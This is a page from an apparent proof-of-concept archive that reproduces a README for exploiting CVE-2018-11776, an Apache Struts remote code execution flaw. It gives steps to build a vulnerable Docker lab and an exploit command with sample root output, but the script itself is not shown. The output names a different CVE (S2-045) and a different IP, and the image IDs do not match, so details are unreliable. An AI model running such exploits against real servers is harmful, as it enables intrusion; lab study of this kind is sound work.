Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2018-11776 PoC — Apache Struts 输入验证错误漏洞

Source
https://github.com/freshdemo/ApacheStruts-CVE-2018-11776
Associated Vulnerability
Title:Apache Struts 输入验证错误漏洞 (CVE-2018-11776)
Description:Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.
Readme
<h3> Apache Struts CVE-2018-11776 Python PoC</h3>

<p>
This is based on https://github.com/hook-s3c/CVE-2018-11776-Python-PoC. The container build and instructions did not work as described in the README so this fork was created. The POC exploit used is from Rapid7.
</p>
<p>
Shoutout:
</p>

<p>
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter <br>
Rapid7 https://github.com/rapid7/metasploit-framework/issues/8064
</p>

<h3>Introduction</h3>

<p>
Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.
</p>

<p>
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
</p>

<p>
Default configuration is not vulnerable. This container, and many others, are vulnerable.
</p>

<h3>Step 1 - Build the Container</h3>

<p>
It's preferrable to build a container from a Dockerfile when you can see what is going into the build.
</p>
<br>

<code>
   git clone https://github.com/freshdemo/ApacheStruts-CVE-2018-11776 ./Struts
</code>
<br>
<code>
   cd Struts
</code>
<br>
<code>
   docker build . -t freshdemo/apachestruts
</code>
<br><br>

<p>
Find the new container with
</p>
<br>

<code>
   docker images
</code>
<br><br>

<p>
The output should be similar to this, where you can get the image ID.
</p>
<br>

   <pre>
   root@DockerHost:~/ApacheStruts-CVE-2018-11776# docker images
REPOSITORY                                 TAG                 IMAGE ID            CREATED              SIZE <br>
freshdemo/apachestruts                     latest              6586cedf49fa        About a minute ago   542MB <br>
</pre>
<br>


<h3>Step 2 - Run the Container</h3>

<p>
Build and start a container with the following.
</p>
<br>

<code>
   docker run -d --name apachestruts -p 8080:8080 d39018c50afe
</code>
<br>

<h3>Step 3 - Exploit</h3>

<p>
Make sure any ingress/egress firewalls permit the port you specified earlier (8080), and run the exploit against your target with the following. 
</p>
<br>

<code>
   python struts.py http://192.168.2.188:8080 'id'
</code>
<br><br>

<p>
Your output should be similar to this.
</p>
<br>

   <pre>
root@k:/home/s# python struts.py http://192.168.2.188:8080 'id'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
http://13.88.250.188:8080 : [*] cmd: id


uid=0(root) gid=0(root) groups=0(root) <br>
   </pre>
<br>
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →